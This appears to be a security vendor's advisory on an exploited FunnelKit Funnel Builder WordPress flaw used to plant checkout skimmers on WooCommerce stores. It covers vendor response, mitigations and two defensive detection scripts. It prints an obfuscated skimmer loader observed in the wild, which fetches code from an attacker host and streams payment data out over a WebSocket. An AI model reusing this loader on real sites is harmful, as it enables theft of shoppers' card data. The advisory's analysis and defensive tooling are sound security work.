Update (May 29, 2026): Following publication, FunnelKit provided additional information regarding its response to this vulnerability. According to FunnelKit, version 3.15.0.3 was released within 36 hours of the initial report, secure updates were distributed through the WordPress.org ecosystem, and known attacker infrastructure associated with the campaign was reported and subsequently DNS-blocked. The “40,000+” figure referenced in this article refers to the plugin’s installation base and should not be interpreted as the number of compromised websites. At the time of original reporting, security researchers observed active exploitation of vulnerable versions in the wild. Organizations should ensure they are running a patched version and review checkout processes and website files for signs of compromise.
Executive Summary
A critical vulnerability affecting FunnelKit’s Funnel Builder plugin for WordPress was exploited by attackers to inject malicious checkout-skimming code into WooCommerce websites. Security researchers observed exploitation activity targeting vulnerable plugin versions prior to remediation.
The vulnerability affected a plugin with more than 40,000 installations. Following disclosure, FunnelKit released version 3.15.0.3, coordinated update deployment through the WordPress ecosystem, and reported attacker infrastructure associated with the campaign.
Organizations using FunnelKit should verify that all installations have been updated to a secure version and review website logs, checkout pages, and administrative activity for indicators of compromise.
Threat Actor Profile
The exploitation campaign exhibits strong alignment with the tactics, techniques, and procedures (TTPs) of Magecart-style cybercriminal groups, notorious for targeting e-commerce platforms with web skimming malware. These actors are financially motivated, highly skilled in obfuscation, and adept at leveraging supply chain vulnerabilities in popular plugins such as Funnel Builder. The attackers utilize infrastructure mimicking legitimate analytics services, such as spoofed Google Analytics or Tag Manager domains, to evade detection and maximize dwell time. While no specific advanced persistent threat (APT) group has been formally attributed, the operational sophistication and monetization strategy are consistent with established Magecart collectives.
Technical Analysis of Malware/TTPs
The vulnerability in Funnel Builder arises from an unauthenticated arbitrary option update flaw. Specifically, the plugin exposes a public checkout endpoint that, in versions prior to 3.15.0.3, lacks adequate permission checks and method restrictions. This allows remote attackers to invoke internal methods and write arbitrary data into the plugin’s global settings.
Attackers exploit this by injecting JavaScript into the “External Scripts” configuration. The injected code is executed on every WooCommerce checkout page, enabling real-time skimming of payment data. The malicious payload is typically obfuscated and masquerades as a legitimate analytics script. For example, observed payloads use base64-encoded URLs and asynchronous script loading to fetch secondary JavaScript from attacker-controlled domains such as analytics-reports[.]com.
A representative payload observed in the wild is as follows:
```javascript
(function(i, s, o, g, r) {
  // Runs after page load, once the checkout form has rendered.
  window.addEventListener("load", function() {
    a = s.createElement(o);   // implicit global, left as observed in the wild
    a.async = 1;
    a.src = atob(r);          // the real loader URL is hidden in base64
    s.body.appendChild(a);
  });
})(
  window,
  document,
  "script",
  "www.google-analytics.com/analytics.js", // decoy: bound to g, never used
  "aHR0cHM6Ly9hbmFseXRpY3MtcmVwb3J0cy5jb20vd3NzL2pxdWVyeS1saWIuanM="
);
```
The base64 string decodes to https://analytics-reports[.]com/wss/jquery-lib.js, which loads a secondary script establishing a WebSocket connection to wss://protect-wss[.]com/ws. Through this channel, a customized skimmer is streamed to the victim’s browser, capturing and exfiltrating payment data in real time.
Key technical indicators include the presence of unfamiliar scripts in the FunnelKit “External Scripts” setting, especially those referencing non-Google domains, and outbound WebSocket connections to suspicious endpoints. The malware is highly evasive, leveraging legitimate-looking domains and asynchronous loading to bypass traditional security controls.
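As an added example (not code from the advisory, from Sansec or from FunnelKit), the following Node.js script triages a script string as an administrator would copy it out of a settings field such as the "External Scripts" option. It pulls out every string literal, decodes any that are base64, and reports every hostname referenced, flagging those outside an allow-list of expected origins. It generalises beyond the atob() pattern above to any base64 literal that decodes to a URL. The allow-list is an assumption to tailor per site; the sample input is the loader shown above, embedded as a constructed string.

```javascript
// Added example, not code from the advisory or from FunnelKit. Triages a script
// string copied from a settings field (such as the "External Scripts" option):
// every string literal is inspected, base64 literals are decoded, and all
// hostnames found are compared against an allow-list of expected origins.

// Constructed sample: the loader shown above, as the triage input.
const SAMPLE_SKIMMER_LOADER = `(function(i, s, o, g, r) {
  window.addEventListener("load", function() {
    a = s.createElement(o);
    a.async = 1;
    a.src = atob(r);
    s.body.appendChild(a);
  });
})(window, document, "script", "www.google-analytics.com/analytics.js",
  "aHR0cHM6Ly9hbmFseXRpY3MtcmVwb3J0cy5jb20vd3NzL2pxdWVyeS1saWIuanM=");`;

// Origins a merchant expects in checkout-page scripts (assumption; tailor per site).
const ALLOWED_HOSTS = new Set(["www.google-analytics.com", "www.googletagmanager.com"]);

// Quoted string literals ('...', "..." or `...`) with escapes respected.
const STRING_LITERAL = /(["'`])((?:\\.|(?!\1)[^\\])*)\1/g;
// Literals that look like a base64 blob: 16+ base64 chars plus optional padding.
const BASE64ISH = /^[A-Za-z0-9+/]{16,}={0,2}$/;

// Returns the lowercase hostname if the literal is a URL or a bare host/path
// such as "www.google-analytics.com/analytics.js"; otherwise null.
function hostFromLiteral(text) {
  const candidate = /^[a-z][a-z0-9+.-]*:\/\//i.test(text) ? text : `https://${text}`;
  try {
    const u = new URL(candidate);
    if (!/^(https?|wss?):$/.test(u.protocol)) return null;
    // Require a dotted name so ordinary words ("load", "script") are not hosts.
    return /^[a-z0-9-]+(\.[a-z0-9-]+)+$/i.test(u.hostname) ? u.hostname.toLowerCase() : null;
  } catch {
    return null;
  }
}

// Decodes a base64 literal to text; null unless it round-trips and is printable ASCII.
function decodeBase64Literal(text) {
  if (!BASE64ISH.test(text)) return null;
  const decoded = Buffer.from(text, "base64").toString("utf8");
  if (Buffer.from(decoded, "utf8").toString("base64") !== text) return null;
  return /^[\x20-\x7e]+$/.test(decoded) ? decoded : null;
}

// Returns { hosts, suspicious, decoded }: all hostnames referenced directly or
// inside base64, the subset outside the allow-list, and the decoded literals.
function triageScript(source) {
  const hosts = new Set();
  const decoded = [];
  for (const match of source.matchAll(STRING_LITERAL)) {
    const literal = match[2];
    const direct = hostFromLiteral(literal);
    if (direct) hosts.add(direct);
    const plain = decodeBase64Literal(literal);
    if (plain) {
      decoded.push(plain);
      const hidden = hostFromLiteral(plain);
      if (hidden) hosts.add(hidden);
    }
  }
  const all = [...hosts].sort();
  return { hosts: all, suspicious: all.filter((h) => !ALLOWED_HOSTS.has(h)), decoded };
}

console.log(JSON.stringify(triageScript(SAMPLE_SKIMMER_LOADER), null, 2));
```

Run against the loader, the script reports both the decoy www.google-analytics.com string and the hidden analytics-reports.com host, and lists only the latter as suspicious. The base64 round-trip check keeps ordinary identifiers that happen to look like base64 from producing noise; a literal that decodes to non-printable bytes is ignored.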
Exploitation in the Wild
The vulnerability was first identified and reported by Sansec, an e-commerce security research firm, which observed active exploitation against WooCommerce stores running vulnerable versions. The attack pattern closely mirrors previous Magecart campaigns: skimmers disguised as analytics scripts and rapid, automated deployment across vulnerable sites.
Victim sites are typically compromised via automated scanning and exploitation of the vulnerable endpoint, followed by injection of the skimmer payload. The attackers then harvest payment data from unsuspecting customers during the checkout process. Stolen data is exfiltrated via WebSocket to attacker infrastructure and is believed to be monetized through dark web carding markets.
The campaign affected a plugin installed on more than 40,000 WordPress websites; security researchers observed active exploitation of vulnerable versions before remediation measures were deployed. The attack is global in scope, affecting e-commerce operators in all regions where WooCommerce and Funnel Builder are deployed.
Vendor Response
Following publication of this article, FunnelKit provided additional details regarding its response to the vulnerability. According to FunnelKit:
- A patched version (3.15.0.3) was released within 36 hours of the initial report.
- Security advisories were distributed to users.
- The WordPress.org plugin team assisted in deploying security updates to existing installations.
- The fix was backported across supported versions.
- Known attacker infrastructure associated with the campaign was reported and subsequently DNS-blocked.
FunnelKit further stated that, based on an internal review of more than 1,300 customer websites conducted after remediation began, only a limited number of compromises were identified before updates reached affected systems, and that because the fix was distributed automatically through the WordPress.org ecosystem and backported to supported release lines, many merchants received protection without manually upgrading to a newer major version.
Rescana has not independently verified these figures. Organizations should continue to validate that all installations are fully updated and conduct compromise assessments where appropriate.
Victimology and Targeting
The primary targets are e-commerce businesses operating WordPress sites with the Funnel Builder plugin installed, particularly those running versions prior to 3.15.0.3. The attack is indiscriminate, affecting small businesses and large retailers alike, with no evidence of sector-specific or geographic targeting. The common denominator is the use of the vulnerable plugin in conjunction with WooCommerce checkout functionality.
Victims include online merchants processing credit card payments, with customer data at risk during the checkout process. The impact extends to end customers, whose payment information may be stolen and subsequently used for fraudulent transactions or sold on underground markets.
Mitigation and Countermeasures
Immediate action is required to mitigate this threat. All organizations using Funnel Builder must update to version 3.15.0.3 or later via the WordPress dashboard. After patching, administrators should review the FunnelKit “External Scripts” setting under Settings > Checkout and remove any unfamiliar or suspicious scripts, particularly those referencing non-Google domains.
A comprehensive malware scan should be conducted using reputable tools such as Sansec eComscan or equivalent, to detect and remove any residual skimmers or backdoors. It is also recommended to review web server logs for evidence of unauthorized option updates or suspicious HTTP requests to the public checkout endpoint.
The vendor patch adds permission checks and restricts the vulnerable endpoint to an allow-list of safe methods, closing the attack vector. Ongoing monitoring for indicators of compromise, such as connections to analytics-reports[.]com or protect-wss[.]com, is advised. Note that the skimmer and its WebSocket channel run in the shopper's browser, not on the merchant's web server, so those connections will not appear in server egress logs; they are best surfaced through an inventory of the scripts the checkout page loads or through browser-reported policy violations.
Organizations should also consider implementing web application firewalls (WAFs) with rules to block known malicious domains and enhance monitoring of checkout page scripts. Regular plugin updates and security reviews are essential to prevent future exploitation.
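As an added example (not from the advisory and not FunnelKit's code), the following Node.js script shows one way to make the browser-side exfiltration channel visible to the merchant: a Content-Security-Policy for the checkout page that restricts script and connection origins, and a classifier for the violation reports browsers send when a page tries to load a script or open a WebSocket to an origin outside that policy. The allow-lists, the report path and the sample reports are assumptions and constructed data; the two IOC hosts are the ones named in this article.

```javascript
// Added example; not code from the original advisory or from FunnelKit.
// The skimmer's WebSocket to the exfiltration host is opened by the shopper's
// browser, so server-side egress monitoring never sees it. A checkout-page
// Content-Security-Policy turns that traffic into a browser violation report
// the merchant can collect. Allow-lists and report path are assumptions.

const SCRIPT_ALLOWLIST = ["'self'", "https://www.google-analytics.com", "https://www.googletagmanager.com"];
const CONNECT_ALLOWLIST = ["'self'", "https://www.google-analytics.com"];

// Builds the response header for the checkout page. Start in report-only mode so
// violations are logged without breaking a live checkout; enforce once clean.
function buildCheckoutCsp({ reportOnly = true, reportPath = "/csp-report" } = {}) {
  const directives = [
    "default-src 'self'",
    `script-src ${SCRIPT_ALLOWLIST.join(" ")}`,
    `connect-src ${CONNECT_ALLOWLIST.join(" ")}`, // governs fetch, XHR and WebSocket
    `report-uri ${reportPath}`,
  ];
  return {
    name: reportOnly ? "Content-Security-Policy-Report-Only" : "Content-Security-Policy",
    value: directives.join("; "),
  };
}

// Hosts named in this article as the campaign's infrastructure.
const CAMPAIGN_IOC_HOSTS = ["analytics-reports.com", "protect-wss.com"];

function allowedHosts(list) {
  return new Set(list.filter((s) => s.startsWith("http")).map((s) => new URL(s).hostname));
}

// Classifies one report-uri body ({"csp-report": {...}}) posted by a browser.
// Returns { verdict, directive, host }.
function classifyCspReport(body) {
  const r = body["csp-report"] || {};
  const directive = (r["effective-directive"] || r["violated-directive"] || "").split(" ")[0];
  let host = null;
  let scheme = null;
  try {
    const u = new URL(r["blocked-uri"]);
    host = u.hostname.toLowerCase();
    scheme = u.protocol;
  } catch {
    // "inline", "eval" and "data" blocked-uri values carry no host; leave null.
  }
  const matchesIoc = host !== null && CAMPAIGN_IOC_HOSTS.some((h) => host === h || host.endsWith("." + h));
  let verdict = "other";
  if (matchesIoc) {
    verdict = "known-campaign-infrastructure";
  } else if (directive === "connect-src" && /^wss?:$/.test(scheme) && !allowedHosts(CONNECT_ALLOWLIST).has(host)) {
    verdict = "unexpected-websocket";
  } else if (directive === "script-src" && host !== null && !allowedHosts(SCRIPT_ALLOWLIST).has(host)) {
    verdict = "unexpected-script";
  }
  return { verdict, directive, host };
}

// Constructed sample reports (not real telemetry), shaped like the report-uri
// JSON a browser posts; only the fields the classifier reads are included.
const SAMPLE_REPORTS = [
  { "csp-report": { "document-uri": "https://shop.example/checkout/", "effective-directive": "script-src", "blocked-uri": "https://analytics-reports.com/wss/jquery-lib.js" } },
  { "csp-report": { "document-uri": "https://shop.example/checkout/", "effective-directive": "connect-src", "blocked-uri": "wss://protect-wss.com/ws" } },
  { "csp-report": { "document-uri": "https://shop.example/checkout/", "effective-directive": "connect-src", "blocked-uri": "wss://chat-widget.example.net/socket" } },
  { "csp-report": { "document-uri": "https://shop.example/checkout/", "effective-directive": "style-src", "blocked-uri": "inline" } },
];

console.log(buildCheckoutCsp());
for (const report of SAMPLE_REPORTS) {
  console.log(classifyCspReport(report));
}
```

Deploy the header in Report-Only mode first and review what legitimate checkout integrations (payment gateways, fraud tooling, chat widgets) trigger before enforcing; an enforced policy with a too-narrow connect-src will break those integrations. The classifier treats any WebSocket to a non-allow-listed host as worth a look even when it does not match this campaign's known hosts, since follow-on campaigns change infrastructure faster than IOC lists are updated.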
Risk Assessment
| Factor | Assessment |
|---|---|
| Plugin Install Base | 40,000+ |
| Exploitation Status | Exploited in the Wild |
| Patch Availability | Available (v3.15.0.3) |
| Current Risk | Elevated for Unpatched Systems |
| Severity | Critical |
Conclusion
This incident highlights the continuing risk posed by vulnerable WordPress plugins in e-commerce environments. While FunnelKit has released patches and taken remediation measures, organizations should verify that all installations have been updated and assess whether compromise occurred prior to patch deployment. Rapid patching, continuous monitoring, and regular security reviews remain critical for protecting customer payment information and maintaining trust in online commerce platforms.
References
BleepingComputer: Funnel Builder WordPress plugin bug exploited to steal credit cards https://www.bleepingcomputer.com/news/security/funnel-builder-wordpress-plugin-bug-exploited-to-steal-credit-cards/
Sansec Research: Critical FunnelKit vulnerability threatens 40,000+ WooCommerce checkouts https://sansec.io/research/funnelkit-woocommerce-vulnerability-exploited
Sansec LinkedIn Advisory https://www.linkedin.com/posts/sansec_a-critical-vulnerability-in-funnel-builder-activity-7460783153562132480-ttT7
WPScan Vulnerability Entry https://wpscan.com/vulnerability/d553cff4-074a-44e7-aebe-e61c86ab8042/
Wordfence Threat Intelligence https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/funnel-builder/funnelkit-funnel-builder-for-woocommerce-checkout-31501-unauthenticated-sql-injection
Reddit Discussion https://www.reddit.com/r/cybersecurity/comments/1tesp1q/funnel_builder_wordpress_plugin_bug_exploited_to/
About Rescana
Rescana is a leader in third-party risk management (TPRM), providing organizations with advanced tools to continuously monitor, assess, and mitigate cyber risks across their digital supply chain. Our platform empowers security teams to identify vulnerabilities, track emerging threats, and ensure compliance with industry best practices. For more information or to discuss your organization’s security posture, we are happy to answer questions at ops@rescana.com.